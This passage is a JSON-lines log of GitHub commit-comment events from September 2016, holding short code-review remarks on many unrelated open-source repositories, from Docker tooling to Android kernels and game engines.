{"id":"4500973662","type":"CommitCommentEvent","actor":{"login":"kapilv9"},"repo":{"name":"kapilv9/Angularjs"},"payload":{"comment":{"id":18859406,"position":10,"line":61,"path":"app/scripts/app_dishcontroller.js","commit_id":"c0d8d5bb222992ce074b6c233ba7da8d807ecad2","created_at":"2016-09-01T07:41:43Z","updated_at":"2016-09-01T07:41:43Z","body":"the date is place inside the submit funciton. The date became static when the page reloaded because it was outside the submit button."}},"created_at":"2016-09-01T07:41:43Z"}
{"id":"4500975224","type":"CommitCommentEvent","actor":{"login":"euangoddard"},"repo":{"name":"2degrees/docker-dev"},"payload":{"comment":{"id":18859410,"position":null,"line":null,"path":null,"commit_id":"419cabefd93d9792285f1ce46ff22a3a17aba696","created_at":"2016-09-01T07:42:00Z","updated_at":"2016-09-01T07:42:00Z","body":"I assume by passing stderr=None (implicitly) this will link stderr from the parent process to the child?"}},"created_at":"2016-09-01T07:42:00Z"}
{"id":"4500975653","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18859414,"position":null,"line":null,"path":null,"commit_id":"fa76e9b0149285d3887d8dac163b5153555af458","created_at":"2016-09-01T07:42:06Z","updated_at":"2016-09-01T07:42:06Z","body":"EP-6-6 (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fa76e9b0149285d3887d8dac163b5153555af458-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-01T07:42:06Z"}
{"id":"4500975940","type":"CommitCommentEvent","actor":{"login":"michaloo"},"repo":{"name":"hull-ships/hull-mailchimp"},"payload":{"comment":{"id":18859415,"position":69,"line":324,"path":"server/lib/mailchimp-agent.js","commit_id":"bd50a11dbafc4b0972b469302c75ed8ed101b692","created_at":"2016-09-01T07:42:12Z","updated_at":"2016-09-01T07:42:12Z","body":"I did it according to this docs point:\r\nhttp://developer.mailchimp.com/documentation/mailchimp/reference/lists/members/#edit-put_lists_list_id_members_subscriber_hash"}},"created_at":"2016-09-01T07:42:12Z"}
{"id":"4500981085","type":"CommitCommentEvent","actor":{"login":"francbartoli"},"repo":{"name":"GeoNode/geonode"},"payload":{"comment":{"id":18859434,"position":null,"line":null,"path":null,"commit_id":"5e4e5d65e7ab43c02ba96a529b54df794deef80c","created_at":"2016-09-01T07:43:28Z","updated_at":"2016-09-01T07:43:28Z","body":"@jj0hns0n that's a correct behavior until someone with admin privileges on the dockerhub of geonode organization will create this new repo which defines the image geonode/geoserver_data. Then the pull can automatically work. My account on dockerhub is not able to do that.\r\n\r\n@ingenieroariel can you do that? \r\n\r\nBefore that time you can build such image from a local repo:\r\n\r\n`$ git clone https://github.com/GeoNode/docker-data`\r\n`$ cd docker-data`\r\n`$ docker build -t geonode/geoserver_data .`\r\n\r\n"}},"created_at":"2016-09-01T07:43:28Z"}
{"id":"4500981830","type":"CommitCommentEvent","actor":{"login":"fr34k8"},"repo":{"name":"bencord0/portage-overlay"},"payload":{"comment":{"id":18859439,"position":null,"line":null,"path":null,"commit_id":"88dab1926df707aeb07a66bb638e4e7a9361f66e","created_at":"2016-09-01T07:43:41Z","updated_at":"2016-09-01T07:43:41Z","body":"Mesos Runs fine or do you have had any issues?"}},"created_at":"2016-09-01T07:43:41Z"}
{"id":"4500988165","type":"CommitCommentEvent","actor":{"login":"arter97"},"repo":{"name":"AOSPA/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":18859452,"position":null,"line":null,"path":null,"commit_id":"42c8a4c7ae0ec54f3487be1433345830c7aeb2a1","created_at":"2016-09-01T07:45:18Z","updated_at":"2016-09-01T07:45:18Z","body":"So the issue's gone?"}},"created_at":"2016-09-01T07:45:18Z"}
{"id":"4500993355","type":"CommitCommentEvent","actor":{"login":"jekkos"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":18859466,"position":7,"line":0,"path":"application/controllers/Secure_Controller.php","commit_id":"2bf82e64720637bb98cf2c961dd50ef273c7b614","created_at":"2016-09-01T07:46:33Z","updated_at":"2016-09-01T07:46:33Z","body":"Check latest version I found a better way to fix this"}},"created_at":"2016-09-01T07:46:33Z"}
{"id":"4500993935","type":"CommitCommentEvent","actor":{"login":"TheCrazyLex"},"repo":{"name":"AOSPA/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":18859468,"position":null,"line":null,"path":null,"commit_id":"42c8a4c7ae0ec54f3487be1433345830c7aeb2a1","created_at":"2016-09-01T07:46:43Z","updated_at":"2016-09-01T07:46:43Z","body":"Yeah :)  @arter97"}},"created_at":"2016-09-01T07:46:43Z"}
{"id":"4500994102","type":"CommitCommentEvent","actor":{"login":"thornley-touchstar"},"repo":{"name":"pepe2k/u-boot_mod"},"payload":{"comment":{"id":18859470,"position":null,"line":null,"path":null,"commit_id":"3527b8cc2a989e51197831eab1f941429f8ffeea","created_at":"2016-09-01T07:46:46Z","updated_at":"2016-09-01T07:46:46Z","body":"Currently I am just using [stress](http://linux.die.net/man/1/stress), there is an lede package. I run with :-\r\n\r\n`stress -c 4 -i 2 -m 2 -d 2 --vm-bytes 4M --hdd-bytes 2M &`\r\n\r\niPerf3 is run as a server on the AR9331 \"iperf3 -s\", and then connected via WiFi from my MAC which runs: -\r\n\r\n`iperf3 -c 192.168.1.1 -P 5`\r\n\r\nI'm aware of the openssl benchmarks, but I haven't had much luck with them yet.\r\n\r\nInterestingly it's the iperf3 tests that seem to cause the lock-up, not the CPU/IO/MEM stress tests."}},"created_at":"2016-09-01T07:46:46Z"}
{"id":"4500998677","type":"CommitCommentEvent","actor":{"login":"euangoddard"},"repo":{"name":"2degrees/docker-dev"},"payload":{"comment":{"id":18859482,"position":5,"line":80,"path":"docker_dev/cli.py","commit_id":"6020eefe087931bdb6d22b6b921db9f935737a94","created_at":"2016-09-01T07:47:59Z","updated_at":"2016-09-01T07:47:59Z","body":"Reading [click's documentation](http://click.pocoo.org/5/options/#boolean-flags) for boolean flags, they say `is_flag` can be inferred by passing the flag in the `--flag/--no-flag` form and setting a default. It's not clear from reading this what the default behaviour is to me."}},"created_at":"2016-09-01T07:47:59Z"}
{"id":"4501002425","type":"CommitCommentEvent","actor":{"login":"MasterCATZ"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18859488,"position":null,"line":null,"path":null,"commit_id":"046baeb17ff4d7ee3238e701af3174500274116e","created_at":"2016-09-01T07:48:54Z","updated_at":"2016-09-01T07:48:54Z","body":"what about "}},"created_at":"2016-09-01T07:48:54Z"}
{"id":"4501003056","type":"CommitCommentEvent","actor":{"login":"MasterCATZ"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18859491,"position":null,"line":null,"path":null,"commit_id":"046baeb17ff4d7ee3238e701af3174500274116e","created_at":"2016-09-01T07:49:03Z","updated_at":"2016-09-01T07:49:03Z","body":"what about https://www.sublimetext.com/3"}},"created_at":"2016-09-01T07:49:03Z"}
{"id":"4501005725","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18859500,"position":null,"line":null,"path":null,"commit_id":"9c363014ef2051527ac52ef3f619e81cf89cf01a","created_at":"2016-09-01T07:49:44Z","updated_at":"2016-09-01T07:49:44Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Q2fytcFMTAmV0-fVSrMSgw"}},"created_at":"2016-09-01T07:49:44Z"}
{"id":"4501011098","type":"CommitCommentEvent","actor":{"login":"lorwal"},"repo":{"name":"jonmcalder/refactor"},"payload":{"comment":{"id":18859515,"position":null,"line":null,"path":null,"commit_id":"b8deb03bc52b5c4eb2b7367128b370b0d3c845a5","created_at":"2016-09-01T07:51:07Z","updated_at":"2016-09-01T07:51:07Z","body":"I am sure the whole testing could be done better here. So much c/p... 😩 maybe with grid.expand and do.call?\r\n"}},"created_at":"2016-09-01T07:51:07Z"}
{"id":"4501013458","type":"CommitCommentEvent","actor":{"login":"zhuyijing"},"repo":{"name":"net-ranger/neutron-vpnaas"},"payload":{"comment":{"id":18859527,"position":13,"line":411,"path":"neutron_vpnaas/services/vpn/service_drivers/ovn_ipsec.py","commit_id":"920552647ceddc732ce458bca2b9173d3cc0f2f4","created_at":"2016-09-01T07:51:42Z","updated_at":"2016-09-01T07:51:42Z","body":"Hello,\r\nI think what you want is to rewrite the _agent_notification function, right? Can we still make this class inherit from base_ipsec.IPsecVpnAgentApi and only override the _agent_notification function. Copy all the functions here is not good."}},"created_at":"2016-09-01T07:51:42Z"}
{"id":"4501015012","type":"CommitCommentEvent","actor":{"login":"Lemongrass3110"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18859529,"position":55,"line":11040,"path":"db/re/item_db.txt","commit_id":"399b98e4a14cf7c4f8c69e2e24c7bff55fb3467a","created_at":"2016-09-01T07:52:05Z","updated_at":"2016-09-01T07:52:05Z","body":"~.~ https://github.com/rathena/rathena/pull/1530"}},"created_at":"2016-09-01T07:52:05Z"}
{"id":"4501017465","type":"CommitCommentEvent","actor":{"login":"Becold"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18859536,"position":null,"line":null,"path":null,"commit_id":"046baeb17ff4d7ee3238e701af3174500274116e","created_at":"2016-09-01T07:52:41Z","updated_at":"2016-09-01T07:52:41Z","body":"Because "}},"created_at":"2016-09-01T07:52:41Z"}
{"id":"4501017769","type":"CommitCommentEvent","actor":{"login":"Becold"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18859538,"position":null,"line":null,"path":null,"commit_id":"046baeb17ff4d7ee3238e701af3174500274116e","created_at":"2016-09-01T07:52:45Z","updated_at":"2016-09-01T07:52:45Z","body":"Because it had this [little shitty alert](https://cloud.githubusercontent.com/assets/12863317/18159552/89f18424-7029-11e6-8f34-dec7bc287a0e.png) lol it sucks.\r\n_###### /s I'm using ST3_"}},"created_at":"2016-09-01T07:52:45Z"}
{"id":"4501017817","type":"CommitCommentEvent","actor":{"login":"lautr3k"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":18859539,"position":null,"line":null,"path":null,"commit_id":"ddc39728400aeca738c58d2c71b2b7478fa8fb92","created_at":"2016-09-01T07:52:46Z","updated_at":"2016-09-01T07:52:46Z","body":"Please, stop publishing in the master branch.  A guide to collaboration will be published soon.\r\nThank you."}},"created_at":"2016-09-01T07:52:46Z"}
{"id":"4501019216","type":"CommitCommentEvent","actor":{"login":"lukemarsden"},"repo":{"name":"microservices-demo/microservices-demo"},"payload":{"comment":{"id":18859541,"position":5,"line":3,"path":"deploy/docker-only/README.md","commit_id":"4904d09c93d9c8068742640a1cdd50bcf58eb60e","created_at":"2016-09-01T07:53:07Z","updated_at":"2016-09-01T07:53:07Z","body":"\"Sock Sho\" typo @pidster "}},"created_at":"2016-09-01T07:53:07Z"}
{"id":"4501020304","type":"CommitCommentEvent","actor":{"login":"danieldietrich"},"repo":{"name":"javaslang/javaslang"},"payload":{"comment":{"id":18859543,"position":null,"line":null,"path":null,"commit_id":"7e1e7f9cfbfdb75dd403bbd2f244830a24c176e1","created_at":"2016-09-01T07:53:22Z","updated_at":"2016-09-01T07:53:22Z","body":"Fixes #1272"}},"created_at":"2016-09-01T07:53:22Z"}
{"id":"4501026486","type":"CommitCommentEvent","actor":{"login":"jackpoz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18859559,"position":null,"line":null,"path":null,"commit_id":"65d0a9478dfcd6c503f78bdf91510e671ea0354f","created_at":"2016-09-01T07:54:57Z","updated_at":"2016-09-01T07:54:57Z","body":"what happened to the discussion at https://github.com/TrinityCore/TrinityCore/issues/754 about using a spellscript ?"}},"created_at":"2016-09-01T07:54:57Z"}
{"id":"4501029832","type":"CommitCommentEvent","actor":{"login":"pingan1927"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18859563,"position":5,"line":44,"path":"components/search-bar/index.web.tsx","commit_id":"a6e45bfad8903469714a342c1a3bccdeec0a0c90","created_at":"2016-09-01T07:55:46Z","updated_at":"2016-09-01T07:55:46Z","body":"改回来了。"}},"created_at":"2016-09-01T07:55:46Z"}
{"id":"4501034245","type":"CommitCommentEvent","actor":{"login":"pingan1927"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18859569,"position":21,"line":98,"path":"components/search-bar/index.web.tsx","commit_id":"a6e45bfad8903469714a342c1a3bccdeec0a0c90","created_at":"2016-09-01T07:56:48Z","updated_at":"2016-09-01T07:56:48Z","body":"原来是这么实现的，看你的RN代码不是这样，\r\n现在再改回来了。"}},"created_at":"2016-09-01T07:56:48Z"}
{"id":"4501042357","type":"CommitCommentEvent","actor":{"login":"adrienbrunet"},"repo":{"name":"pybee/pybee.github.io"},"payload":{"comment":{"id":18859583,"position":null,"line":null,"path":null,"commit_id":"b18d31545dcb9e071032bf1602929b9ab418514e","created_at":"2016-09-01T07:58:46Z","updated_at":"2016-09-01T07:58:46Z","body":"Really strange, looks like my last commit was only about removing everything in the tether folder, even the js and css folder! Anyway, problem solved :+1:"}},"created_at":"2016-09-01T07:58:46Z"}
{"id":"4501044531","type":"CommitCommentEvent","actor":{"login":"ArseniyShestakov"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18859597,"position":null,"line":null,"path":null,"commit_id":"076924166a443ae747784df09b6c5cae822e61bb","created_at":"2016-09-01T07:59:17Z","updated_at":"2016-09-01T07:59:17Z","body":"I agree that usage of \"empty\" would be more accurate there. Though not sure if it's always worth it since sometimes \"size\" more readoble.\r\n\r\nDo you think it's really worth it performance-wise in our case? Not just there, but in all codebase.\r\nWouldn't that be optimized by compiler anyway?"}},"created_at":"2016-09-01T07:59:17Z"}
{"id":"4501052662","type":"CommitCommentEvent","actor":{"login":"Fasse"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18859611,"position":null,"line":null,"path":null,"commit_id":"ef5145c887817daa646509a592a9f3f6cb10ed88","created_at":"2016-09-01T08:01:12Z","updated_at":"2016-09-01T08:01:12Z","body":"Demo-DB always have the previous version, in our case the 3.1 so we can test the update process. After release of 3.2 the Demo-dB in Master will be 3.2"}},"created_at":"2016-09-01T08:01:12Z"}
{"id":"4501058662","type":"CommitCommentEvent","actor":{"login":"AdamWebb1"},"repo":{"name":"Lordmau5/Tidown"},"payload":{"comment":{"id":18859626,"position":null,"line":null,"path":null,"commit_id":"368be3c8f0c17b577ad6b9dc7e5dcc62dedf63b2","created_at":"2016-09-01T08:02:37Z","updated_at":"2016-09-01T08:02:37Z","body":"Could you clarify which Operating system you're using?"}},"created_at":"2016-09-01T08:02:37Z"}
{"id":"4501058772","type":"CommitCommentEvent","actor":{"login":"philipbelesky"},"repo":{"name":"czlee/tabbycat"},"payload":{"comment":{"id":18859627,"position":4,"line":243,"path":"tabbycat/results/forms.py","commit_id":"5fb984b8719ccf911c13ec839bc9ed77e8ee93a1","created_at":"2016-09-01T08:02:39Z","updated_at":"2016-09-01T08:02:39Z","body":"These work out to be the speaker score fields right? I'm pretty sure `$(\"select.required.error\").removeClass(\"error\");` is used here explicitly to overwrite an error when using the pre-filled 'generic' speaker names. I'm not sure what that error might be though — maybe try removing it and seeing if there are any problems with validation for the prefilled generic speaker name teams? If so line 14 of enter_results.js can be removed as well."}},"created_at":"2016-09-01T08:02:39Z"}
{"id":"4501059291","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18859629,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-01T08:02:46Z","updated_at":"2016-09-01T08:02:46Z","body":"could be tried.. needs some testing "}},"created_at":"2016-09-01T08:02:46Z"}
{"id":"4501060991","type":"CommitCommentEvent","actor":{"login":"Maxr1998"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18859632,"position":31,"line":32,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/utils/ViewUtils.java","commit_id":"f95e467479213f597344547a1908a3a4e23e9007","created_at":"2016-09-01T08:03:09Z","updated_at":"2016-09-01T08:03:09Z","body":"@wasdennnoch I just wanted to point out that you don't need to set the layout params again since you have a reference to them, not a copy."}},"created_at":"2016-09-01T08:03:09Z"}
{"id":"4501065417","type":"CommitCommentEvent","actor":{"login":"arter97"},"repo":{"name":"AOSPA/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":18859641,"position":null,"line":null,"path":null,"commit_id":"7fc2509a267ff2aec8789a705b836363eb25125c","created_at":"2016-09-01T08:04:13Z","updated_at":"2016-09-01T08:04:13Z","body":"Whoa, when did you merge 1.3.2 xD"}},"created_at":"2016-09-01T08:04:13Z"}
{"id":"4501067189","type":"CommitCommentEvent","actor":{"login":"THENEWGAMECREATOR"},"repo":{"name":"mozilla/BrowserQuest"},"payload":{"comment":{"id":18859647,"position":null,"line":null,"path":null,"commit_id":"af32d247cac3495ca430d0effbb88dd5f3250b2c","created_at":"2016-09-01T08:04:38Z","updated_at":"2016-09-01T08:04:38Z","body":"I tried to play it to test but it said it could not connect to the server, could you tell me if this is a problem or if it's just down. thx\r\nTHENEWGAMECREATOR (TNGC)"}},"created_at":"2016-09-01T08:04:38Z"}
{"id":"4501072903","type":"CommitCommentEvent","actor":{"login":"lucab"},"repo":{"name":"kinvolk/rkt"},"payload":{"comment":{"id":18859658,"position":9,"line":683,"path":"stage0/run.go","commit_id":"7fa63f21e76c1aa2c3c1831222ede15c553c582e","created_at":"2016-09-01T08:06:02Z","updated_at":"2016-09-01T08:06:02Z","body":"I think @sgotti is actually actively trying to get rid of this manifest copy: https://github.com/coreos/rkt/issues/3098"}},"created_at":"2016-09-01T08:06:02Z"}
{"id":"4501076994","type":"CommitCommentEvent","actor":{"login":"GregoryLundberg"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18859664,"position":null,"line":null,"path":null,"commit_id":"22763798c7ed840c221f2aaef4b799d29044651e","created_at":"2016-09-01T08:06:58Z","updated_at":"2016-09-01T08:06:58Z","body":"In DM we have custom unit types: Journeyman Mage->Mage Leader->Mage Commander->Mage Magister, and I want to use:\r\n\r\n    type_tree=\"Mage,Journeyman Mage\"\r\n\r\nand\r\n\r\n    [not]\r\n        type_tree=\"Mage,Journeyman Mage\"\r\n    [/not]\r\n\r\nIt works for Mage and its advancements but does not work for Journeyman Mage and its advancements."}},"created_at":"2016-09-01T08:06:58Z"}
{"id":"4501084167","type":"CommitCommentEvent","actor":{"login":"franciscoruiz"},"repo":{"name":"2degrees/docker-dev"},"payload":{"comment":{"id":18859675,"position":null,"line":null,"path":null,"commit_id":"419cabefd93d9792285f1ce46ff22a3a17aba696","created_at":"2016-09-01T08:08:38Z","updated_at":"2016-09-01T08:08:38Z","body":"Correct, that's the default."}},"created_at":"2016-09-01T08:08:38Z"}
{"id":"4501086665","type":"CommitCommentEvent","actor":{"login":"2461968610"},"repo":{"name":"2461968610/My-first-project"},"payload":{"comment":{"id":18859683,"position":null,"line":null,"path":null,"commit_id":"ed67bfdc427822289027484831821ef81e4960dc","created_at":"2016-09-01T08:09:14Z","updated_at":"2016-09-01T08:09:14Z","body":"sha"}},"created_at":"2016-09-01T08:09:14Z"}
{"id":"4501090276","type":"CommitCommentEvent","actor":{"login":"xiangyaguo"},"repo":{"name":"xiangyaguo/DKNightVersion"},"payload":{"comment":{"id":18859693,"position":null,"line":null,"path":null,"commit_id":"30b46d2fdec15739f7c6545265fbecbd657ee9d9","created_at":"2016-09-01T08:10:09Z","updated_at":"2016-09-01T08:10:09Z","body":"又更新了一下。"}},"created_at":"2016-09-01T08:10:09Z"}
{"id":"4501092718","type":"CommitCommentEvent","actor":{"login":"xiangyaguo"},"repo":{"name":"xiangyaguo/DKNightVersion"},"payload":{"comment":{"id":18859699,"position":29,"line":68,"path":"DKNightVersion/Manual/UISearchBar+Keyboard.m","commit_id":"30b46d2fdec15739f7c6545265fbecbd657ee9d9","created_at":"2016-09-01T08:10:42Z","updated_at":"2016-09-01T08:10:42Z","body":"又更新了下"}},"created_at":"2016-09-01T08:10:42Z"}
{"id":"4501093676","type":"CommitCommentEvent","actor":{"login":"kieranjol"},"repo":{"name":"amiaopensource/vrecord"},"payload":{"comment":{"id":18859706,"position":null,"line":null,"path":null,"commit_id":"dedee723f3f36bc98a8c75caab1a6142fe272fb5","created_at":"2016-09-01T08:10:55Z","updated_at":"2016-09-01T08:10:55Z","body":"Perhaps this is a question for CELLAR? It sounds like the existing tag vocabulary does not map to  the process history involved in digitising a tape. I think that there might be some work being done this with MXF at the moment. Perhaps the Matroska maintainers would be open to an expansion?"}},"created_at":"2016-09-01T08:10:55Z"}
{"id":"4501099276","type":"CommitCommentEvent","actor":{"login":"aphofstede"},"repo":{"name":"aphofstede/laravel5-3-example"},"payload":{"comment":{"id":18859722,"position":24,"line":150,"path":"app/Repositories/BlogRepository.php","commit_id":"1d9f67c97d450a384089bd8c845ee3b0cf8d017b","created_at":"2016-09-01T08:12:16Z","updated_at":"2016-09-01T08:12:16Z","body":"This method name implies it gets a post for a certain user"}},"created_at":"2016-09-01T08:12:16Z"}
{"id":"4501099538","type":"CommitCommentEvent","actor":{"login":"viciious"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18859724,"position":null,"line":null,"path":null,"commit_id":"076924166a443ae747784df09b6c5cae822e61bb","created_at":"2016-09-01T08:12:19Z","updated_at":"2016-09-01T08:12:19Z","body":"Well, checks for empty or not are considered to be more idiomatically correct.\r\nPerformance wise they only make a difference in case of lists."}},"created_at":"2016-09-01T08:12:19Z"}
{"id":"4501104748","type":"CommitCommentEvent","actor":{"login":"huangzehao"},"repo":{"name":"huangzehao/SCN_Matlab"},"payload":{"comment":{"id":18859750,"position":null,"line":null,"path":null,"commit_id":"e232ccec20facd4c3bf2baccfe993dceca251c55","created_at":"2016-09-01T08:13:32Z","updated_at":"2016-09-01T08:13:32Z","body":"Hi, you can check the implementation code of SRCNN. Use for loop and conv2 to implement convolution.\r\n\r\n在 2016年9月1日，15:19，Peng Liu <notifications@github.com<mailto:notifications@github.com>> 写道：\r\n\r\nHi,\r\n\r\nI am thinking if we can use matlab code only to test instead of MatconvNet.\r\n\r\nThe attached file is my code. but it seems not working.\r\n\r\ncould you check for me?\r\n\r\nOn Wed, Aug 31, 2016 at 4:22 AM, Maxsky <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n> Hi, check the new update of caffe-vdsr.\r\n>\r\n> ―\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/huangzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993dceca251c55#commitcomment-18842873>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AIZJ5TjvyWQukl5-o4PDNz5aB9ybeHYGks5qlTm-gaJpZM4JxO8i>\r\n> .\r\n>\r\n\r\n―\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/huangzehao/SCN_Matlab/commit/e232ccec20facd4c3bf2baccfe993dceca251c55#commitcomment-18859116>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ANB22m_tF_mMwv1nUVXav4A-k4IJi6axks5qlnx4gaJpZM4JxO8i>.\r\n"}},"created_at":"2016-09-01T08:13:32Z"}
{"id":"4501107098","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":18859757,"position":null,"line":null,"path":null,"commit_id":"076924166a443ae747784df09b6c5cae822e61bb","created_at":"2016-09-01T08:14:06Z","updated_at":"2016-09-01T08:14:06Z","body":"In c++11 list::size should be also constant."}},"created_at":"2016-09-01T08:14:06Z"}
{"id":"4501107213","type":"CommitCommentEvent","actor":{"login":"chenzhubing"},"repo":{"name":"chenzhubing/Test"},"payload":{"comment":{"id":18859758,"position":null,"line":null,"path":null,"commit_id":"af9bb7ab54bdc939f6427103f7eaa5bb51fd431f","created_at":"2016-09-01T08:14:08Z","updated_at":"2016-09-01T08:14:08Z","body":"sdf"}},"created_at":"2016-09-01T08:14:08Z"}
{"id":"4501107618","type":"CommitCommentEvent","actor":{"login":"NicoPennec"},"repo":{"name":"HiFaraz/node-playbook"},"payload":{"comment":{"id":18859760,"position":3,"line":150,"path":"README.md","commit_id":"c4100e15254f8bbbf1564a36f0250c08651fec11","created_at":"2016-09-01T08:14:14Z","updated_at":"2016-09-01T08:14:14Z","body":"Create **two** subfolders:"}},"created_at":"2016-09-01T08:14:14Z"}
{"id":"4501108001","type":"CommitCommentEvent","actor":{"login":"chenzhubing"},"repo":{"name":"chenzhubing/Test"},"payload":{"comment":{"id":18859761,"position":null,"line":null,"path":null,"commit_id":"af9bb7ab54bdc939f6427103f7eaa5bb51fd431f","created_at":"2016-09-01T08:14:19Z","updated_at":"2016-09-01T08:14:19Z","body":"杀神风"}},"created_at":"2016-09-01T08:14:19Z"}
{"id":"4501109962","type":"CommitCommentEvent","actor":{"login":"bencord0"},"repo":{"name":"bencord0/portage-overlay"},"payload":{"comment":{"id":18859767,"position":null,"line":null,"path":null,"commit_id":"88dab1926df707aeb07a66bb638e4e7a9361f66e","created_at":"2016-09-01T08:14:46Z","updated_at":"2016-09-01T08:14:46Z","body":"Yes, I have some success running mesos with these ebuilds, but I haven't managed to do much more testing that making sure that the basic C bindings work, and the JNI bindings for mesosphere.\r\n\r\nI'm still using non ebuild init/systemd scripts for starting the services as I'm not paying attention to any of the usual docs about how to configure the services. It appears that I can just set 12factor.net style environment variables, and inject them using systemd's `EnvironmentFile=` directive.\r\n\r\nI have managed to setup an unencrypted/unauthenticated mesos+marathon cluster, but it's nowhere near production worthy because TLS and authentication is not part of these releases unless you are running DC/OS or front the server with nginx."}},"created_at":"2016-09-01T08:14:46Z"}
{"id":"4501111480","type":"CommitCommentEvent","actor":{"login":"liuli64"},"repo":{"name":"liuli64/hello-world"},"payload":{"comment":{"id":18859771,"position":null,"line":null,"path":null,"commit_id":"ee21807a9b9e1aa213cb99b9fc9e9de5d1131827","created_at":"2016-09-01T08:15:08Z","updated_at":"2016-09-01T08:15:08Z","body":"**刘澧**\r\n\r\n> 今天很高兴"}},"created_at":"2016-09-01T08:15:08Z"}
{"id":"4501113828","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18859775,"position":51,"line":51,"path":"indico/modules/events/abstracts/controllers/email_templates.py","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-01T08:15:36Z","updated_at":"2016-09-01T08:15:36Z","body":"shouldn't this be handled by `populate_obj()`?"}},"created_at":"2016-09-01T08:15:36Z"}
{"id":"4501114368","type":"CommitCommentEvent","actor":{"login":"undefinedreality"},"repo":{"name":"undefinedreality/test"},"payload":{"comment":{"id":18859778,"position":null,"line":null,"path":null,"commit_id":"49d9a24c9702e32907a3373110e4fe3243e5c69a","created_at":"2016-09-01T08:15:44Z","updated_at":"2016-09-01T08:15:44Z","body":"somethng"}},"created_at":"2016-09-01T08:15:44Z"}
{"id":"4501114586","type":"CommitCommentEvent","actor":{"login":"mortezarz"},"repo":{"name":"mortezarz/pgatest1"},"payload":{"comment":{"id":18859779,"position":null,"line":null,"path":null,"commit_id":"6fc592626bbb2633f7ca947a4e7f765935506336","created_at":"2016-09-01T08:15:46Z","updated_at":"2016-09-01T08:15:46Z","body":"Awesome :)"}},"created_at":"2016-09-01T08:15:46Z"}
{"id":"4501115729","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18859783,"position":47,"line":47,"path":"indico/modules/events/abstracts/controllers/email_templates.py","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-01T08:16:03Z","updated_at":"2016-09-01T08:16:03Z","body":"would be nicer if the field worked without specifying an empty list in the defaults"}},"created_at":"2016-09-01T08:16:03Z"}
{"id":"4501115813","type":"CommitCommentEvent","actor":{"login":"funinthefalls"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":18859784,"position":null,"line":null,"path":null,"commit_id":"ddc39728400aeca738c58d2c71b2b7478fa8fb92","created_at":"2016-09-01T08:16:04Z","updated_at":"2016-09-01T08:16:04Z","body":"No problem, I was just doing things the way I always have with the documentation on the 3 previous versions. I will hold off on any other documentation until I have the collaboration guide to read. Sorry for any issues I may have caused. "}},"created_at":"2016-09-01T08:16:04Z"}
{"id":"4501136954","type":"CommitCommentEvent","actor":{"login":"npgall"},"repo":{"name":"npgall/cqengine"},"payload":{"comment":{"id":18859808,"position":null,"line":null,"path":null,"commit_id":"f4fd2e6b2b829fc982c2307ea54f11ee3dc0ad43","created_at":"2016-09-01T08:20:36Z","updated_at":"2016-09-01T08:20:36Z","body":"Yes I saw what you had done in ES4J Yurii and I thought it was pretty cool! It's a nice approach.\r\n\r\nYou use field reflection as opposed to lamda reflection though right? I think your approach is a bit more robust. As I don't control the origin of the lambdas, I think I need to read types directly from the lambda itself though unfortunately. So indeed it won't work in all situations. \r\n\r\nOverall I'm pretty happy with the result though - and especially that it's all still compatible with Java 6 too!\r\n\r\nI've added a warning in the JavaDocs of the new methods in QueryFactory, that the support to auto-infer generic types of lambdas might not work in all situations and on all platforms. And there's a descriptive exception message as well, which will be thrown if this happens.\r\n\r\nSo the docs and 